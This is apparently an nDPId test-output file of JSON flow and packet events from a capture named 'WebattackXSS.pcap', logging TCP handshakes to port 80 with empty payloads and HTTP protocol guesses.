+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347276278,"flow_last_seen":1499347276278,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347276278,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1499347276278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347276278,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8RHhAAD4GgVisEAABwKgKMtiuAFAiVFExAAAAAKACchD7\/AAAAgQFtAQCCAoBOhVJAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":2,"flow_last_seen":1499347276278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347276278,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2K6190rBIlRRMqAScSARgAAAAgQFtAQCCAoD4+a\/AToVSQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2573,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":3,"flow_last_seen":1499347276279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347276279,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0RHlAAD4GgV+sEAABwKgKMtiuAFAiVFEytfdKwoAQAOWwhwAAAQEICgE6FUkD4+a\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347277521,"flow_last_seen":1499347277521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347277521,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1499347277521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347277521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EvlAAD4GstesEAABwKgKMti8AFAjjgSGAAAAAKACchBGKgAAAgQFtAQCCAoBOhZ\/AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":2,"flow_last_seen":1499347277521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347277521,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2LxShGbpI44Eh6AScSChwgAAAgQFtAQCCAoD4+f1AToWfwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2585,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":3,"flow_last_seen":1499347277521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347277521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EvpAAD4Gst6sEAABwKgKMti8AFAjjgSHUoRm6oAQAOVAygAAAQEICgE6Fn8D4+f1"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347280049,"flow_last_seen":1499347280049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347280049,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1499347280049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347280049,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qXBAAD4GHGCsEAABwKgKMtjWAFBVFLGHAAAAAKACchBlEAAAAgQFtAQCCAoBOhj3AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2605,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":2,"flow_last_seen":1499347280049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347280049,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2NbA11G6VRSxiKAScSBlDAAAAgQFtAQCCAoD4+ptAToY9wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2606,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1499347280050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347280050,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qXFAAD4GHGesEAABwKgKMtjWAFBVFLGIwNdRu4AQAOUEEwAAAQEICgE6GPgD4+pt"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347281325,"flow_last_seen":1499347281325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347281325,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1499347281325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347281325,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8klhAAD4GM3isEAABwKgKMtjkAFB+h4huAAAAAKACchBjaQAAAgQFtAQCCAoBOho2AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2614,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":2,"flow_last_seen":1499347281325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347281325,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ORl6oVWfoeIb6AScSCJdwAAAgQFtAQCCAoD4+usAToaNgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2615,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":3,"flow_last_seen":1499347281326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347281326,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kllAAD4GM3+sEAABwKgKMtjkAFB+h4hvZeqFV4AQAOUofwAAAQEICgE6GjYD4+us"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2625,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347282573,"flow_last_seen":1499347282573,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282573,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2625,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1499347282573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347282573,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mj1AAD4GK5OsEAABwKgKMtjyAFDR4YFTAAAAAKACchAV5AAAAgQFtAQCCAoBOhtuAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1499347282574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347282574,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2PL\/kZOB0eGBVKAScSCS5gAAAgQFtAQCCAoD4+zlATobbgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1499347282574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347282574,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mj5AAD4GK5qsEAABwKgKMtjyAFDR4YFU\/5GTgoAQAOUx7QAAAQEICgE6G28D4+zl"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347150236,"flow_last_seen":1499347155656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347150236,"flow_last_seen":1499347155656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347151520,"flow_last_seen":1499347156656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347151520,"flow_last_seen":1499347156656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347152786,"flow_last_seen":1499347158656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347152786,"flow_last_seen":1499347158656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347155346,"flow_last_seen":1499347160658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347155346,"flow_last_seen":1499347160658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347156630,"flow_last_seen":1499347161658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347156630,"flow_last_seen":1499347161658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347285114,"flow_last_seen":1499347285114,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347285114,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1499347285114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347285114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AAxAAD4GxcSsEAABwKgKMtkMAFDF1B3mAAAAAKACchCCyAAAAgQFtAQCCAoBOh3qAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1499347285114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347285114,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2Qzzh7fuxdQd56AScSDk7AAAAgQFtAQCCAoD4+9gATod6gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2646,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1499347285115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347285115,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AA1AAD4GxcusEAABwKgKMtkMAFDF1B3n84e374AQAOWD9AAAAQEICgE6HeoD4+9g"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347286403,"flow_last_seen":1499347286403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347286403,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1499347286403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347286403,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8meVAAD4GK+usEAABwKgKMtkaAFAW6IbJAAAAAKACchDHgQAAAgQFtAQCCAoBOh8sAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2656,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":2,"flow_last_seen":1499347286403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347286403,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2Rp9ePmhFuiGyqAScSBcwAAAAgQFtAQCCAoD4\/CiATofLAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":3,"flow_last_seen":1499347286404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347286404,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0meZAAD4GK\/KsEAABwKgKMtkaAFAW6IbKfXj5ooAQAOX7xwAAAQEICgE6HywD4\/Ci"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347287659,"flow_last_seen":1499347287659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347287659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1499347287659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347287659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA814FAAD4G7k6sEAABwKgKMtkoAFDVWPfnAAAAAKACchCWqgAAAgQFtAQCCAoBOiBmAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":2,"flow_last_seen":1499347287659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347287659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2Sh6EWHG1Vj36KAScSDF8QAAAgQFtAQCCAoD4\/HcATogZgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":3,"flow_last_seen":1499347287660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347287660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA014JAAD4G7lWsEAABwKgKMtkoAFDVWPfoehFhx4AQAOVk+QAAAQEICgE6IGYD4\/Hc"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347290163,"flow_last_seen":1499347290163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347290163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1499347290163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347290163,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D11AAD4GtnOsEAABwKgKMtlCAFDDfi2FAAAAAKACchBwWwAAAgQFtAQCCAoBOiLYAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2686,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":2,"flow_last_seen":1499347290164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347290164,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ULBAUn+w34thqAScSBuCAAAAgQFtAQCCAoD4\/ROAToi2AEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":3,"flow_last_seen":1499347290164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347290164,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D15AAD4GtnqsEAABwKgKMtlCAFDDfi2GwQFJ\/4AQAOUNEAAAAQEICgE6ItgD4\/RO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347291442,"flow_last_seen":1499347291442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347291442,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 